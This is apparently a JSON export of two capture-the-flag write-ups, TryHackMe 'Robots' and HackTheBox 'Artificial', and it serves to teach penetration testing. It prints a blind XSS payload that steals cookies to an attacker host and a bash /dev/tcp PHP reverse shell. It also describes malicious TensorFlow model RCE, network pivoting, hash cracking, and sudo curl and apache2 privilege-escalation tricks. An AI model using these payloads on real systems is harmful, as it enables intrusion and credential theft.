[{"content":"Stealing HttpOnly protected cookies with Blind XSS, escalating a RFI to RCE, pivoting in a docker network with Ligolo-ng, cracking some hashes and taking advantage of miss-configured permissions.\nRecon Nmap Scan sudo nmap -sS robots.thm -T5 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 9000/tcp open cslistener Fuzzing / dirsearch -u http://robots.thm [15:48:58] 200 - 74B - /robots.txt Robots.txt Disallow: /harming/humans Disallow: /ignoring/human/orders Disallow: /harm/to/self Upon vistiting these urls, /harm/to/self returns a 200 ok , the others a 403 forbidden\nFuzzing /harm/to/self dirsearch -u http://robots.thm/harm/to/self/ [15:53:14] 200 - 252B - /harm/to/self/admin.php [15:53:39] 200 - 0B - /harm/to/self/config.php [15:53:42] 301 - 319B - /harm/to/self/css -\u0026gt; http://robots.thm/harm/to/self/css/ [15:54:02] 200 - 394B - /harm/to/self/login.php [15:54:02] 302 - 0B - /harm/to/self/logout.php -\u0026gt; index.php [15:54:21] 200 - 491B - /harm/to/self/register.php Note : Even tho admin.php returns 200 OK , its a forbidden page.\nInitial Access Vulnerability Detection and Analysis So i visited /harm/to/self/register.php and was met with:\nSo i invited myself in and created an account with username \u0026ldquo;hacker\u0026rdquo; and date \u0026ldquo;15/02/2002\u0026rdquo; and got the password for it with:\necho \u0026#34;hacker1502\u0026#34; | md5sum Inside i noticed that my username was reflected in the HTML. I also noticed a weird button to view the PHP server info page. So up until now i was thinking of a Blind XSS to steal the admin cookies and that was it, but then i noticed this HttpOnly flag\u0026hellip;. So that left me thinking, what am i supposed to do if its impossible to steal cookies with the HttpOnly flag set\u0026hellip; Stealing Cookies Via Blind XSS Despite HttpOnly Flag So the idea behind this lies in the fact that the cookies are exposed in the PHP Server Info page, in this section right here\u0026hellip;1 And so it appears on the HTML completely unprotected.. Soooo , lets steal them.\n\u0026lt;img src=x onerror=\u0026#34;fetch(\u0026#39;http://robots.thm/harm/to/self/server_info.php\u0026#39;) .then(response =\u0026gt; response.text()) .then(text =\u0026gt; { cookie = text.match(/Cookie.{1,2000}/)[0]; fetch(\u0026#39;http://IP:8000/?cookie=\u0026#39; + encodeURIComponent(cookie)); });\u0026#34;\u0026gt; This payload fetches the page that contains the cookies, it searches for the \u0026ldquo;Cookie\u0026rdquo; with a regex - so that we dont get the full page - and then it sends a request to our server with it.\nSo we spin up a local server with python , create a user with that payload as username and wait.\npython -m http.server 8000 We can just base64 decode this information and we got ourselves the admin cookie.\nAnalyzing the Admin Panel We can now visit the /admin.php that i found during the recon and we find the following. And so it turns out that we have LFI RFI and SSRF due to that include function.\nEscalating a RFI to RCE We just have to host a php reverse shell and include it on the server.\n\u0026lt;?php exec(\u0026#34;/bin/bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/IP/4444 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;); ?\u0026gt; And we got a Shell as www-data\nNote: Try Penelope\nLateral Movement Searching the Box As soon as we get in we find a config.php containing some credentials\n$servername = \u0026#34;db\u0026#34;; $username = \u0026#34;robots\u0026#34;; $password = REDACTED; $dbname = \u0026#34;web\u0026#34;; But when we try to to connect to any database we notice that there is no service running or client installed. Upon searching a bit more we find some clues, On the machine Root there is a .dockerenv and we see the following on /etc/hosts:\n172.18.0.3 robots.thm robots Indicating that we are inside a container, what if we try to enumerate the 172.18.0.0/24 to find some more services on other containers?\nLeveraging Ligolo-ng to Scan the Docker Network We can use Ligolo-ng to create a tunnel from the docker network to our attack machine, and then use nmap to see if we can find some more services. For the ligolo setup i followed this documentation 2\nSo we run the proxy on our machine with\nsudo ./proxy -selfcert and upload the agent to the target and run :\n./agent -connect IP:11601 --ignore-cert We can now see that we got a session on ou proxy, we use the command session to attach to it and then we setup a interface for it and routing settings.\ninterface_create --name \u0026#34;ligolo\u0026#34; interface_add_route --name ligolo --route 172.18.0.0/24 Now the docker network is acessible to our attacker machine and we can use nmap like so:\nnmap 172.18.0.0/24 -e ligolo Nmap scan report for 172.18.0.2 PORT STATE SERVICE 280/tcp filtered http-mgmt 3306/tcp open mysql 4000/tcp filtered remoteanything 5000/tcp filtered upnp Database Connection and Password Cracking We can now use the previous found credentials in the config.php and conect to the database.\nmariadb -h 172.18.0.2 -u robots -P 3306 -D web By using hashes.com we detected that this is just an md5. So it might be the md5 hash of md5(username+ddmm). I tried it on myself and it is. So by chance rgiskard could have just left his default password unchanged, and we can bruteforce it. Thats exactly what happened and i did so with the following script.\nimport hashlib username = \u0026#34;rgiskard\u0026#34; FoundHash = \u0026#34;REDACTED\u0026#34; for month in range(1,13): for day in range(1,32): combo = username + f\u0026#34;{day:02d}{month:02d}\u0026#34; md5_hash = hashlib.md5(combo.encode()).hexdigest() md5_second_hash = hashlib.md5(md5_hash.encode()).hexdigest() if(md5_second_hash == FoundHash): print(\u0026#34;Found\u0026#34;) print(combo) print(md5_hash) print(md5_second_hash) Finally i tried to use the found password to connect via ssh and it worked. We got ssh connection to rgiskard.\nNote: This brute-force could be done from the start with knowledge of the username so technically this lets people skip to this part i guess\u0026hellip;\nMore Lateral Movement to dolivaw Upon entering the machine as rgiskard there is no flag to be seen and so it become obvious that we need to move to the user dolivaw. We have this sudo output:\nUser rgiskard may run the following commands on ubuntu-jammy: (dolivaw) /usr/bin/curl 127.0.0.1/* And so i found this resource3 online that tells us exactly what we need to do to move to this user. We are going to use curl to write our ssh public key to the dolivaw authorized keys and then login via ssh. On our machine we generate a key.\nssh-keygen -f key chmod +x 600 key Then upload the public key (key.pub) to the target machine in my case to /tmp/key.pub, and then run the following command:\nsudo -u dolivaw /usr/bin/curl 127.0.0.1/ -o /tmp/ignore file:///tmp/key.pub -o /home/dolivaw/.ssh/authorized_keys Now we can connect to dolivaw via ssh like so and retrieve the user flag.\nssh dolivaw@10.66.183.185 -i key Privesc As dolivaw the story kind of repeats itself, is again a sudo trick because we have this:\nUser dolivaw may run the following commands on ubuntu-jammy: (ALL) NOPASSWD: /usr/sbin/apache2 and so running this command4 will get us the root flag:\nsudo apache2 -C \u0026#39;Define APACHE_RUN_DIR /\u0026#39; -C \u0026#39;Include /root/root.txt\u0026#39; Sources Stealing Cookies With PhpInfo()\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nLigolo-ng Documentation\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nSudo Curl Privesc\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nApache2 File Read\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://vitorribeiro.sh/writeups/robots/","summary":"\u003cp\u003eStealing HttpOnly protected cookies with Blind XSS, escalating a RFI to RCE, pivoting in a docker network with Ligolo-ng, cracking some hashes and taking advantage of miss-configured permissions.\u003c/p\u003e","title":"THM - Robots"},{"content":"Exploiting a Tersorflow Remote Code Execution with Malicious .h5 Model and Escalating to Root via a Misconfigured Backrest Service\nRecon Nmap Scan sudo nmap -A 10.10.11.74 -T5 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) Initial Access Vulnerability Identification Upon registering on the platform we encounter the following.. The website lets us upload our .h5 AI models , upon some research i found this article1 stating that we can embed payloads into AI models.\nLater i found this payload2\nNote that the payload has to be crafted on the specific tensorflow version 2.13.1 , stated on the requirements.txt\nPayload Crafting and Exploitation Since i had a newer python version not supporting tensorflow 2.13.1 i used pyenv to manage older python versions.\npyenv install 3.10.13 pyenv virtualenv 3.10.13 tf-2.13-env pyenv activate tf-2.13-env pip install tensorflow==2.13.1 Inside this env ran the script with my ip and port , and a nc listener\nnc -lvnp 4444 after that uploaded the file Exploit.h5 to the website, ran it and got a shell as app.\nLateral Movement Searching the Box Inside the box i found a file named users.db that i ex-filtrated to my host. Opened it with a sqlite gui and got:\nDecryption Pasted the hashes on hashes.com and got the results.\ngael@artificial.htb : c99175974b6e192936d97224638a34f8: REDACTED\nroyer@artificial.htb bc25b1f80f544c0ab451c02a3dca9fc6: REDACTED\nIn the future royer was useless.\nUser Flag We got a connection to the box as gael via ssh using the cracked password. And like so we got the user flag.\nPrivilege Escalation Searching the Box After searching for a while we found that gael is sysadmin and has access to a backup folder on /var/backups/backrest_backup.tar.gz We also found that the box has port 9898 open serving as backrest web service.\nSearching Backup Folder Inside the folder we found config.json that has:\n\u0026#34;name\u0026#34;: \u0026#34;backrest_root\u0026#34;, \u0026#34;passwordBcrypt\u0026#34;: \u0026#34;JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\u0026#34; using Hashes.com tool to detect hash type we see that is is base 64 encoded and decoding it gives :\n$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO Using the same technique we found it to be bcrypt , has expected and after trying hashes.com with no sucess tried hascat with rockyou and got:\n$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:REDACTED Analyzing open port 9898 We redirect that open port to our host via ssh :\nssh -L 9898:localhost:9898 gael@10.10.10.10 Prompt to log in we used the previous creds with success.\nGetting Root This is a web ui for restic backups 3\nInside the ui we went to Repos , and select run comand we got a prompt. after using the comand help we found out about :\nSnapshots to see snapshot ids (backups) ls [snapshotID] - list direscories Dump [SnapshotID] [File Path] - to retreive data from a file So the final comands to get the flag was was:\ndump 64bc9183 /root/root.txt Sources Embeding Payloads Into AI Models\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nAI Model Payload\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nBackrest GitHub Page\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://vitorribeiro.sh/writeups/artificial/","summary":"\u003cp\u003eExploiting a Tersorflow Remote Code Execution with Malicious .h5 Model and Escalating to Root via a Misconfigured Backrest Service\u003c/p\u003e","title":"HTB - Artificial"},{"content":"","permalink":"https://vitorribeiro.sh/html/","summary":"","title":""}]